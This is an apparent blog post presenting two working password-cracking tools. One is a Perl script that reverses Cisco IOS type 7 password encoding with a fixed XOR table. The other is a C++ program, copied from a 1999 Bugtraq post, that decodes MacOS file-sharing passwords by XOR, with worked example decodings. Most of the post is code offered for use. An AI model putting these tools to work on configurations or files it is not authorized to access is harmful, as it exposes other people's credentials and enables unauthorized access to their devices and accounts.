Cracking the CISCO IOS Password
The following Perl Script, demonstrates how to decrypt the CISCO IOS passwords.
_____________________________
#!/usr/bin/perl -w
# $Id: ios7decrypt.pl,v 1.1 1998/01/11 21:31:12 mesrik Exp $
#
# Credits for orginal code and description hobbit@avian.org,
# SPHiXe, .mudge et al. and for John Bashinski <jbash@CISCO.COM>
# for Cisco IOS password encryption facts.
#
# Use for any malice or illegal purposes strictly prohibited!
#
@xlat = ( 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41,
0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c,
0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53 , 0x55, 0x42 );
while (<>) {
if (/(password|md5)\s+7\s+([\da-f]+)/io) {
if (!(length($2) & 1)) {
$ep = $2; $dp = "";
($s, $e) = ($2 =~ /^(..)(.+)/o);
for ($i = 0; $i < length($e); $i+=2) {
$dp .= sprintf "%c",hex(substr($e,$i,2))^$xlat[$s++];
}
s/$ep/$dp/;
}
}
print;
}
_____________________
Cracking the MacOS Password
The following piece of code demonstrates the working of the algorithm used by MacOS to encrypt password and also how to decrypt such passwords. So Enjoy!!!!
/*
macfspwd.c
Written by Nate Pierce
luphus@iastate.edu
http://happiness.dhs.org
July 14, 1999
Algorithm taken from:
http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=519
I have tested this on 8.6 and it works fine as well.
Compiled quite peachily on linux 2.2.10 with:
g++ -o macfspwd macfspwd.c
Run example (with debug on):
[user@server user]$ ./macfspwd 000406180D0A190B
Original string: 00 04 06 18 0d 0a 19 0b
1st XOR string: 00 00 04 06 18 0d 0a 19
2nd XOR string: 73 70 63 67 74 70 72 6b
Password is: stayaway
----- from the url above -----
The encryption algorithm in MacOS system is simple and the password can be easily
decoded.
Password is stored in Users & Groups Data File in Preferences folder. Offset is different on
each system and depends on Users & Groups configuration, but it always lie after owner's
username. It's not so difficult to find it using a hex editor, even if we don't know owner's
username.
Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1
AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh
where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)
aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH
An example:
Let's take OO 04 06 18 0D 0A 19 0B
00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; O2H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y
tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5.
copied verbatim from a post to bugtraq by Dawid adix Adamski <adixx@FRIKO4.ONET.PL> on
July 10, 1999
----- snip -----
*/
#include<iostream.h>
#include<iomanip.h>
#include<fstream.h>
#include<string.h>
/* comment this out if don't want to see the extra info */
#define DEBUG
/* I think the max password length for file sharing is 8 characters */
#define PWLEN 8
int hexdig(char q);
/* returns decimal equiv if q is 0-9, a-f, or A-F */
int hexint(char p,char q);
/* returns value of 2 digits spliced together - hexint(15,15) will return 255 */
int main(int argc, char *argv[]){
int s1[10],s2[10],s3[10],i;
char pwd[PWLEN+1];
/* first string - try 000406180D0A190B */
if(argc>1){
for(i=0;i<strlen(argv[argc-1]);i+=2){
if(hexdig(argv[argc-1][i])&&hexdig(argv[argc-1][i+1]))s1[i/2]=hexint(argv[argc-1][i],argv[argc-1][i+1]);
else{
cout<<"\nError: last argument should be a 16 digit hex number! (no spaces please)\n";
return 1;
}
}
}
/* chunk in 2nd XOR string - based on the string from the file*/
s2[0]=0x0;
for(i=0;i<PWLEN-1;i++){
s2[i+1]=s1[i];
}
/* chunk in final XOR string - this is constant */
s3[0]=0x73;
s3[1]=0x70;
s3[2]=0x63;
s3[3]=0x67;
s3[4]=0x74;
s3[5]=0x70;
s3[6]=0x72;
s3[7]=0x6B;
#ifdef DEBUG
cout<<"Original string: ";
for(i=0;i<PWLEN;i++){
if(s1[i]<0x10)cout<<"0";
cout<<hex<<s1[i]<<" ";
}
cout<<"\n1st XOR string: ";
cout<<"00 ";
for(i=0;i<PWLEN-1;i++){
if(s2[i+1]<0x10)cout<<"0";
cout<<hex<<s2[i+1]<<" ";
}
cout<<"\n2nd XOR string: ";
for(i=0;i<PWLEN;i++){
if(s3[i]<0x10)cout<<"0";
cout<<hex<<s3[i]<<" ";
}
cout<<endl;
#endif
cout<<"Password is: ";
for(i=0;i<PWLEN;i++)pwd[i]=s1[i]^s2[i]^s3[i];
pwd[PWLEN]=0x0;
cout<<pwd<<endl;
return 0;
}
int hexdig(char q){
if(q>47 && q<58)return 48;
if(q>64 && q<71)return 55;
if(q>96 && q<103)return 87;
return 0;
}
int hexint(char p,char q){
return 16*(p-hexdig(p))+(q-hexdig(q));
}
thanks for reading this three cracking post if you not read previous two please visit this two link for reading this
thank you
No comments:
Post a Comment